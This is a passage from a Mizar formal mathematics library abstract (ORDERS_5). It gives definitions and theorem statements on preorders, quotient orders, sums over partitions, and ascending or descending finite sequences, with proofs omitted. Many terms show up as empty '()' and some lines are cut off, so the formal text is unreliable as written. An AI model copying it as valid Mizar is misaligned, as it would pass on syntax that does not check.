end;\nuniqueness\nfor b1, b2 being Equivalence_Relation of the carrier of A st ( for x, y being Element of A holds\n( [x,y] in b1 iff ( x <= y & y <= x ) ) ) & ( for x, y being Element of A holds\n( [x,y] in b2 iff ( x <= y & y <= x ) ) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem ORDERS_5:def 5 :\ncanceled;\n\n:: deftheorem Def6 defines EqRelOf ORDERS_5:def 6 :\nfor A being Preorder\nfor b2 being Equivalence_Relation of the carrier of A holds\n( b2 = EqRelOf A iff for x, y being Element of A holds\n( [x,y] in b2 iff ( x <= y & y <= x ) ) );\n\ntheorem Th41: :: ORDERS_5:32\nfor A being Preorder holds EqRelOf A = EqRel A\nproof end;\n\nregistration\nlet A be empty Preorder;\ncoherence\nEqRelOf A is empty\n;\nend;\n\nregistration\nlet A be non empty Preorder;\ncluster EqRelOf A -> non empty ;\ncoherence\nnot EqRelOf A is empty\n;\nend;\n\ntheorem Th42: :: ORDERS_5:33\nfor A being Order holds EqRelOf A = id the carrier of A\nproof end;\n\ndefinition\nlet A be Preorder;\nfunc QuotientOrder A -> strict RelStr means :Def7: :: ORDERS_5:def 7\n( the carrier of it = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of it iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x 
<= y ) ) ) );\nexistence\nex b1 being strict RelStr st\n( the carrier of b1 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b1 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) )\nproof end;\nuniqueness\nfor b1, b2 being strict RelStr st the carrier of b1 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b1 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) & the carrier of b2 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b2 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def7 defines QuotientOrder ORDERS_5:def 7 :\nfor A being Preorder\nfor b2 being strict RelStr holds\n( b2 = QuotientOrder A iff ( the carrier of b2 = Class () & ( for X, Y being Element of Class () holds\n( [X,Y] in the InternalRel of b2 iff ex x, y being Element of A st\n( X = Class ((),x) & Y = Class ((),y) & x <= y ) ) ) ) );\n\nregistration\nlet A be empty Preorder;\ncoherence\nproof end;\nend;\n\ntheorem Th43: :: ORDERS_5:34\nfor A being non empty Preorder\nfor x being Element of A holds Class ((),x) in the carrier of ()\nproof end;\n\nregistration\nlet A be non empty Preorder;\ncoherence\nnot QuotientOrder A is empty\nby Th43;\nend;\n\ntheorem Th44: :: ORDERS_5:35\nfor A being Preorder holds the InternalRel of () = <=E A\nproof end;\n\nregistration\nlet A be Preorder;\ncoherence\nproof end;\nend;\n\n:: this generalizes DICKSON:10 to possibly empty RelStr\nregistration\nlet A be LinearPreorder;\ncoherence\nproof end;\nend;\n\ndefinition\nlet A be Preorder;\nfunc proj A -> Function of A,() means :Def8: :: ORDERS_5:def 8\nfor x being Element of A holds it . x = Class ((),x);\nexistence\nex b1 being Function of A,() st\nfor x being Element of A holds b1 . x = Class ((),x)\nproof end;\nuniqueness\nfor b1, b2 being Function of A,() st ( for x being Element of A holds b1 . x = Class ((),x) ) & ( for x being Element of A holds b2 . x = Class ((),x) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def8 defines proj ORDERS_5:def 8 :\nfor A being Preorder\nfor b2 being Function of A,() holds\n( b2 = proj A iff for x being Element of A holds b2 . x = Class ((),x) );\n\nregistration\nlet A be empty Preorder;\ncluster proj A -> empty ;\ncoherence\nproj A is empty\n;\nend;\n\nregistration\nlet A be non empty Preorder;\ncluster proj A -> non empty ;\ncoherence\nnot proj A is empty\n;\nend;\n\ntheorem Th45: :: ORDERS_5:36\nfor A being non empty Preorder\nfor x, y being Element of A st x <= y holds\n(proj A) . x <= (proj A) . y\nproof end;\n\ntheorem :: ORDERS_5:37\nfor A being Preorder\nfor x, y being Element of A st x =~ y holds\n(proj A) . x = (proj A) . 
y\nproof end;\n\ndefinition\nlet A be Preorder;\nlet R be Equivalence_Relation of the carrier of A;\nattr R is EqRelOf-like means :Def9: :: ORDERS_5:def 9\nR = EqRelOf A;\nend;\n\n:: deftheorem Def9 defines EqRelOf-like ORDERS_5:def 9 :\nfor A being Preorder\nfor R being Equivalence_Relation of the carrier of A holds\n( R is EqRelOf-like iff R = EqRelOf A );\n\nregistration\nlet A be Preorder;\ncorrectness\ncoherence ;\n;\nend;\n\nregistration\nlet A be Preorder;\ncluster Relation-like the carrier of A -defined the carrier of A -valued total quasi_total reflexive symmetric transitive EqRelOf-like for Element of K16(K17( the carrier of A, the carrier of A));\nexistence\nex b1 being Equivalence_Relation of the carrier of A st b1 is EqRelOf-like\nproof end;\nend;\n\ndefinition\nlet A be Preorder;\nlet R be EqRelOf-like Equivalence_Relation of the carrier of A;\nlet x be Element of A;\n:: original: Im\nredefine func Class (R,x) -> Element of ();\ncoherence\nIm (R,x) is Element of ()\nproof end;\nend;\n\ntheorem Th47: :: ORDERS_5:38\nfor A being Preorder holds the carrier of () is a_partition of the carrier of A\nproof end;\n\ntheorem Th48: :: ORDERS_5:39\nfor A being non empty Preorder\nfor D being non empty a_partition of the carrier of A st D = the carrier of () holds\nproj A = proj D\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nfunc PreorderFromPartition D -> strict RelStr equals :: ORDERS_5:def 10\nRelStr(# A,(ERl D) #);\ncorrectness\ncoherence\nRelStr(# A,(ERl D) #) is strict RelStr\n;\n;\nend;\n\n:: deftheorem defines PreorderFromPartition ORDERS_5:def 10 :\nfor A being set\nfor D being a_partition of A holds PreorderFromPartition D = RelStr(# A,(ERl D) #);\n\nregistration\nlet A be non empty set ;\nlet D be a_partition of A;\ncoherence ;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\ncoherence ;\ncoherence\nproof end;\nend;\n\ntheorem Th49: :: ORDERS_5:40\nfor A being set\nfor D being a_partition of A holds ERl D = EqRelOf\nproof end;\n\nDef5: for A being set\nfor D being a_partition of A holds Class (ERl D) = D\n\nby PARTIT1:38;\n\ntheorem Th50: :: ORDERS_5:41\nfor A being set\nfor D being a_partition of A holds D = Class ()\nproof end;\n\ntheorem Th51: :: ORDERS_5:42\nfor A being set\nfor D being a_partition of A holds D = the carrier of\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nlet X be Element of D;\nlet f be Function;\nfunc eqSupport (f,X) -> Subset of A equals :: ORDERS_5:def 11\n() /\\ X;\ncorrectness\ncoherence\n() /\\ X is Subset of A\n;\nproof end;\nend;\n\n:: deftheorem defines eqSupport ORDERS_5:def 11 :\nfor A being set\nfor D being a_partition of A\nfor X being Element of D\nfor f being Function holds eqSupport (f,X) = () /\\ X;\n\ndefinition\nlet A be Preorder;\nlet X be Element of ();\nlet f be Function;\nfunc eqSupport (f,X) -> Subset of A means :Def12: :: ORDERS_5:def 12\nex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & it = eqSupport (f,Y) );\nexistence\nex b1 being Subset of A ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b1 = eqSupport (f,Y) )\nproof end;\nuniqueness\nfor b1, b2 being Subset of A st ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b1 = eqSupport (f,Y) ) & ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b2 = eqSupport (f,Y) ) holds\nb1 = 
b2\n;\nend;\n\n:: deftheorem Def12 defines eqSupport ORDERS_5:def 12 :\nfor A being Preorder\nfor X being Element of ()\nfor f being Function\nfor b4 being Subset of A holds\n( b4 = eqSupport (f,X) iff ex D being a_partition of the carrier of A ex Y being Element of D st\n( D = the carrier of () & Y = X & b4 = eqSupport (f,Y) ) );\n\ndefinition\nlet A be Preorder;\nlet X be Element of ();\nlet f be Function;\nredefine func eqSupport (f,X) equals :: ORDERS_5:def 13\n() /\\ X;\ncorrectness\ncompatibility\nfor b1 being Subset of A holds\n( b1 = eqSupport (f,X) iff b1 = () /\\ X )\n;\nproof end;\nend;\n\n:: deftheorem defines eqSupport ORDERS_5:def 13 :\nfor A being Preorder\nfor X being Element of ()\nfor f being Function holds eqSupport (f,X) = () /\\ X;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function;\nlet X be Element of D;\ncluster eqSupport (f,X) -> finite ;\ncorrectness\ncoherence\neqSupport (f,X) is finite\n;\n;\nend;\n\nregistration\nlet A be Preorder;\nlet f be finite-support Function;\nlet X be Element of ();\ncluster eqSupport (f,X) -> finite ;\ncorrectness\ncoherence\neqSupport (f,X) is finite\n;\n;\nend;\n\nregistration\nlet A be Order;\nlet X be Element of the carrier of ();\nlet f be finite-support Function of A,REAL;\ncluster eqSupport (f,X) -> trivial ;\ncoherence\neqSupport (f,X) is trivial\nproof end;\nend;\n\ntheorem Th52: :: ORDERS_5:43\nfor A being set\nfor D being a_partition of A\nfor X being Element of D\nfor f being Function of A,REAL holds eqSupport (f,X) = eqSupport ((- f),X)\nproof end;\n\ntheorem :: ORDERS_5:44\nfor A being Preorder\nfor X being Element of ()\nfor f being Function of A,REAL holds eqSupport (f,X) = eqSupport ((- f),X)\nproof end;\n\ndefinition\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function of A,REAL;\nfunc D eqSumOf f -> Function of D,REAL means :Def14: :: ORDERS_5:def 14\nfor X being Element of D st X in D holds\nit . X = Sum (f * (canFS (eqSupport (f,X))));\nexistence\nex b1 being Function of D,REAL st\nfor X being Element of D st X in D holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X))))\nproof end;\nuniqueness\nfor b1, b2 being Function of D,REAL st ( for X being Element of D st X in D holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X)))) ) & ( for X being Element of D st X in D holds\nb2 . X = Sum (f * (canFS (eqSupport (f,X)))) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def14 defines eqSumOf ORDERS_5:def 14 :\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL\nfor b4 being Function of D,REAL holds\n( b4 = D eqSumOf f iff for X being Element of D st X in D holds\nb4 . 
X = Sum (f * (canFS (eqSupport (f,X)))) );\n\ndefinition\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\nfunc eqSumOf f -> Function of (),REAL means :Def15: :: ORDERS_5:def 15\nex D being a_partition of the carrier of A st\n( D = the carrier of () & it = D eqSumOf f );\nexistence\nex b1 being Function of (),REAL ex D being a_partition of the carrier of A st\n( D = the carrier of () & b1 = D eqSumOf f )\nproof end;\nuniqueness\nfor b1, b2 being Function of (),REAL st ex D being a_partition of the carrier of A st\n( D = the carrier of () & b1 = D eqSumOf f ) & ex D being a_partition of the carrier of A st\n( D = the carrier of () & b2 = D eqSumOf f ) holds\nb1 = b2\n;\nend;\n\n:: deftheorem Def15 defines eqSumOf ORDERS_5:def 15 :\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor b3 being Function of (),REAL holds\n( b3 = eqSumOf f iff ex D being a_partition of the carrier of A st\n( D = the carrier of () & b3 = D eqSumOf f ) );\n\ndefinition\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\nredefine func eqSumOf f means :Def16: :: ORDERS_5:def 16\nfor X being Element of () st X in the carrier of () holds\nit . X = Sum (f * (canFS (eqSupport (f,X))));\ncorrectness\ncompatibility\nfor b1 being Function of (),REAL holds\n( b1 = eqSumOf f iff for X being Element of () st X in the carrier of () holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X)))) )\n;\nproof end;\nend;\n\n:: deftheorem Def16 defines eqSumOf ORDERS_5:def 16 :\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor b3 being Function of (),REAL holds\n( b3 = eqSumOf f iff for X being Element of () st X in the carrier of () holds\nb3 . X = Sum (f * (canFS (eqSupport (f,X)))) );\n\ntheorem Th54: :: ORDERS_5:45\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL holds D eqSumOf (- f) = - (D eqSumOf f)\nproof end;\n\ntheorem Th55: :: ORDERS_5:46\nfor A being Preorder\nfor f being finite-support Function of A,REAL holds eqSumOf (- f) = - ()\nproof end;\n\nTh56: for A being set\nfor D being a_partition of A\nfor f being nonnegative-yielding finite-support Function of A,REAL holds D eqSumOf f is nonnegative-yielding\n\nproof end;\n\nregistration\nlet A be Preorder;\nlet f be nonnegative-yielding finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be nonnegative-yielding finite-support Function of A,REAL;\ncoherence by Th56;\nend;\n\ntheorem Th58: :: ORDERS_5:47\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\nD eqSumOf f is nonpositive-yielding\nproof end;\n\ntheorem :: ORDERS_5:48\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\neqSumOf f is nonpositive-yielding\nproof end;\n\ntheorem Th60: :: ORDERS_5:49\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor x being Element of A st ( for y being Element of A st x =~ y holds\nx = y ) holds\n(() * (proj A)) . x = f . 
x\nproof end;\n\ntheorem Th61: :: ORDERS_5:50\nfor A being Order\nfor f being finite-support Function of A,REAL holds () * (proj A) = f\nproof end;\n\ntheorem :: ORDERS_5:51\nfor A being Order\nfor f1, f2 being finite-support Function of A,REAL st eqSumOf f1 = eqSumOf f2 holds\nf1 = f2\nproof end;\n\ntheorem Th63: :: ORDERS_5:52\nfor A being Preorder\nfor f being finite-support Function of A,REAL holds support () c= (proj A) .: ()\nproof end;\n\ntheorem Th64: :: ORDERS_5:53\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL holds support (D eqSumOf f) c= (proj D) .: ()\nproof end;\n\n:: more general:\n:: for x holds (for y in (proj A).x holds f.y >= 0) or\n:: (for y in (proj A).x holds f.y <= 0)\ntheorem Th65: :: ORDERS_5:54\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonnegative-yielding holds\n(proj A) .: () = support ()\nproof end;\n\ntheorem :: ORDERS_5:55\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL st f is nonnegative-yielding holds\n(proj D) .: () = support (D eqSumOf f)\nproof end;\n\ntheorem Th67: :: ORDERS_5:56\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\n(proj A) .: () = support ()\nproof end;\n\ntheorem :: ORDERS_5:57\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\n(proj D) .: () = support (D eqSumOf f)\nproof end;\n\nregistration\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\ntheorem Th69: :: ORDERS_5:58\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of D st rng s2 = (proj D) .: (rng s1) & ( for X being Element of D st X in rng s2 holds\neqSupport (f,X) c= rng s1 ) holds\nSum ((D eqSumOf f) * s2) = Sum (f * s1)\nproof end;\n\ntheorem Th70: :: ORDERS_5:59\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of D st rng s1 = support f & rng s2 = support (D eqSumOf f) holds\nSum ((D eqSumOf f) * s2) = Sum (f * s1)\nproof end;\n\ntheorem :: ORDERS_5:60\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of () st rng s1 = support f & rng s2 = support () holds\nSum (() * s2) = Sum (f * s1)\nproof end;\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is weakly-ascending means :: ORDERS_5:def 17\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <= s /. m;\nend;\n\n:: deftheorem defines weakly-ascending ORDERS_5:def 17 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <= s /. m );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is ascending means :: ORDERS_5:def 18\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <~ s /. 
m;\nend;\n\n:: deftheorem defines ascending ORDERS_5:def 18 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <~ s /. m );\n\n:: it is surprising that this isn't a trivial proof by Def4\nregistration\nlet A be RelStr ;\ncluster ascending -> weakly-ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is ascending holds\nb1 is weakly-ascending\nproof end;\nend;\n\ndefinition\nlet A be antisymmetric RelStr ;\nlet s be FinSequence of A;\nredefine attr s is ascending means :Def19: :: ORDERS_5:def 19\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m;\ncorrectness\ncompatibility\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m )\n;\nproof end;\nend;\n\n:: deftheorem Def19 defines ascending ORDERS_5:def 19 :\nfor A being antisymmetric RelStr\nfor s being FinSequence of A holds\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is weakly-descending means :: ORDERS_5:def 20\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <= s /. n;\nend;\n\n:: deftheorem defines weakly-descending ORDERS_5:def 20 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <= s /. n );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is descending means :: ORDERS_5:def 21\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <~ s /. n;\nend;\n\n:: deftheorem defines descending ORDERS_5:def 21 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <~ s /. n );\n\nregistration\nlet A be RelStr ;\ncluster descending -> weakly-descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is descending holds\nb1 is weakly-descending\nproof end;\nend;\n\ndefinition\nlet A be antisymmetric RelStr ;\nlet s be FinSequence of A;\nredefine attr s is descending means :: ORDERS_5:def 22\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. n;\ncorrectness\ncompatibility\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. n )\n;\nproof end;\nend;\n\n:: deftheorem defines descending ORDERS_5:def 22 :\nfor A being antisymmetric RelStr\nfor s being FinSequence of A holds\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. 
n );\n\nregistration\nlet A be antisymmetric RelStr ;\ncluster one-to-one weakly-ascending -> ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-ascending holds\nb1 is ascending\nproof end;\ncluster one-to-one weakly-descending -> descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-descending holds\nb1 is descending\nproof end;\nend;\n\nregistration\nlet A be antisymmetric RelStr ;\ncoherence\nfor b1 being FinSequence of A st b1 is weakly-ascending & b1 is weakly-descending holds\nb1 is constant\nproof end;\nend;\n\nregistration\nlet A be reflexive RelStr ;\ncoherence\nfor b1 being FinSequence of A st b1 is constant holds\n( b1 is weakly-ascending & b1 is weakly-descending )\nproof end;\nend;\n\nregistration\nlet A be RelStr ;\ncoherence\n( <*> the carrier of A is ascending & <*> the carrier of A is weakly-ascending & <*> the carrier of A is descending & <*> the carrier of A is weakly-descending )\n;\nend;\n\nregistration\nlet A be RelStr ;\nexistence\nex b1 being FinSequence of A st\n( b1 is empty & b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nproof end;\nend;\n\nTh72: for A being non empty RelStr\nfor x being Element of A holds\n( <*x*> is ascending & <*x*> is weakly-ascending & <*x*> is descending & <*x*> is weakly-descending )\n\nproof end;\n\nregistration\nlet A be non empty RelStr ;\nlet x be Element of A;\ncoherence\nfor b1 being FinSequence of A st b1 = <*x*> holds\n( b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nby Th72;\nend;\n\nregistration\nlet A be non empty RelStr ;\nexistence\nex b1 being FinSequence of A st\n( not b1 is empty & b1 is one-to-one & b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is asc_ordering means :: ORDERS_5:def 23\n( s is one-to-one & s is weakly-ascending );\nattr s is desc_ordering means :: ORDERS_5:def 24\n( s is one-to-one & s is weakly-descending );\nend;\n\n:: deftheorem defines asc_ordering ORDERS_5:def 23 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is asc_ordering iff ( s is one-to-one & s is weakly-ascending ) );\n\n:: deftheorem defines desc_ordering ORDERS_5:def 24 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is desc_ordering iff ( s is one-to-one & s is weakly-descending ) );\n\nregistration\nlet A be RelStr ;\ncluster asc_ordering -> one-to-one weakly-ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is asc_ordering holds\n( b1 is one-to-one & b1 is weakly-ascending )\n;\ncluster one-to-one weakly-ascending -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-ascending holds\nb1 is asc_ordering\n;\ncoherence\nfor b1 being FinSequence of A st b1 is desc_ordering holds\n( b1 is one-to-one & b1 is weakly-descending )\n;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-descending holds\nb1 is desc_ordering\n;\nend;\n\n:: I thought the following registration would only work with trasitivity\n:: but apparently ascending implies asc_ordering\nregistration\nlet A be RelStr ;\ncluster ascending -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is ascending 
holds\nb1 is asc_ordering\nproof end;\ncluster descending -> desc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is descending holds\nb1 is desc_ordering\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet B be Subset of A;\nlet s be FinSequence of A;\nattr s is B -asc_ordering means :: ORDERS_5:def 25\n( s is asc_ordering & rng s = B );\nattr s is B -desc_ordering means :: ORDERS_5:def 26\n( s is desc_ordering & rng s = B );\nend;\n\n:: deftheorem defines -asc_ordering ORDERS_5:def 25 :\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff ( s is asc_ordering & rng s = B ) );\n\n:: deftheorem defines -desc_ordering ORDERS_5:def 26 :\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -desc_ordering iff ( s is desc_ordering & rng s = B ) );\n\nregistration\nlet A be RelStr ;\nlet B be Subset of A;\ncluster B -asc_ordering -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -asc_ordering holds\nb1 is asc_ordering\n;\ncluster B -desc_ordering -> desc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -desc_ordering holds\nb1 is desc_ordering\n;\nend;\n\nregistration\nlet A be RelStr ;\nlet B be empty Subset of A;\ncluster B -asc_ordering -> empty for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -asc_ordering holds\nb1 is empty\n;\ncluster B -desc_ordering -> empty for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -desc_ordering holds\nb1 is empty\n;\nend;\n\ntheorem Th73: :: ORDERS_5:61\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-ascending iff Rev s is weakly-descending )\nproof end;\n\ntheorem :: ORDERS_5:62\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is ascending iff Rev s is descending )\nproof end;\n\ntheorem Th75: :: ORDERS_5:63\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff Rev s is B -desc_ordering )\nproof end;\n\n:: this seems trivial, I'm unsure why\ntheorem :: ORDERS_5:64\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st ( s is B -asc_ordering or s is B -desc_ordering ) holds\nB is finite ;\n\nregistration\nlet A be antisymmetric RelStr ;\ncluster asc_ordering -> ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is asc_ordering holds\nb1 is ascending\n;\ncluster desc_ordering -> descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is desc_ordering holds\nb1 is descending\n;\nend;\n\ntheorem Th77: :: ORDERS_5:65\nfor A being antisymmetric RelStr\nfor B being Subset of A\nfor s1, s2 being FinSequence of A st s1 is B -asc_ordering & s2 is B -asc_ordering holds\ns1 = s2\nproof end;\n\ntheorem :: ORDERS_5:66\nfor A being antisymmetric RelStr\nfor B being Subset of A\nfor s1, s2 being FinSequence of A st s1 is B -desc_ordering & s2 is B -desc_ordering holds\ns1 = s2\nproof end;\n\ntheorem Th79: :: ORDERS_5:67\nfor A being LinearOrder\nfor B being finite Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff s = SgmX ( the InternalRel of A,B) )\nproof end;\n\nregistration\nlet A be LinearOrder;\nlet B be finite Subset of A;\ncluster SgmX ( the InternalRel of A,B) -> B -asc_ordering ;\ncoherence\nSgmX ( the InternalRel of A,B) 
is B -asc_ordering\nby Th79;\nend;\n\ntheorem Th80: :: ORDERS_5:68\nfor A being RelStr\nfor B, C being Subset of A\nfor s being FinSequence of A st s is B -asc_ordering & C c= B holds\nex s2 being FinSequence of A st s2 is C -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:69\nfor A being RelStr\nfor B, C being Subset of A\nfor s being FinSequence of A st s is B -desc_ordering & C c= B holds\nex s2 being FinSequence of A st s2 is C -desc_ordering\nproof end;\n\ntheorem Th82: :: ORDERS_5:70\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A\nfor x being Element of A st B = {x} & s = <*x*> holds\n( s is B -asc_ordering & s is B -desc_ordering )\nproof end;\n\ntheorem Th83: :: ORDERS_5:71\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st s is B -asc_ordering holds\nthe InternalRel of A is_connected_in B\nproof end;\n\ntheorem :: ORDERS_5:72\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st s is B -desc_ordering holds\nthe InternalRel of A is_connected_in B\nproof end;\n\ntheorem Th85: :: ORDERS_5:73\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -asc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\nx <= y ) holds\nex s2 being FinSequence of A st\n( s2 = <*x*> ^ s1 & s2 is B -asc_ordering )\nproof end;\n\ntheorem Th86: :: ORDERS_5:74\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -asc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\ny <= x ) holds\nex s2 being FinSequence of A st\n( s2 = s1 ^ <*x*> & s2 is B -asc_ordering )\nproof end;\n\ntheorem :: ORDERS_5:75\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -desc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\nx <= y ) holds\nex s2 being FinSequence of A st\n( s2 = s1 ^ <*x*> & s2 is B -desc_ordering )\nproof end;\n\ntheorem :: ORDERS_5:76\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -desc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\ny <= x ) holds\nex s2 being FinSequence of A st\n( s2 = <*x*> ^ s1 & s2 is B -desc_ordering )\nproof end;\n\ntheorem Th89: :: ORDERS_5:77\nfor A being transitive RelStr\nfor B being finite Subset of A st the InternalRel of A is_connected_in B holds\nex s being FinSequence of A st s is B -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:78\nfor A being transitive RelStr\nfor B being finite Subset of A st the InternalRel of A is_connected_in B holds\nex s being FinSequence of A st s is B -desc_ordering\nproof end;\n\ntheorem Th91: :: ORDERS_5:79\nfor A being transitive connected RelStr\nfor B being finite Subset of A ex s being FinSequence of A st s is B -asc_ordering\nproof end;\n\ntheorem Th92: :: ORDERS_5:80\nfor A being transitive connected RelStr\nfor B being finite Subset of A ex s being FinSequence of A st s is B -desc_ordering\nproof end;\n\nregistration\nlet A be transitive connected RelStr ;\nlet B be finite Subset of A;\nexistence\nex b1 being FinSequence of A st b1 is B -asc_ordering\nby 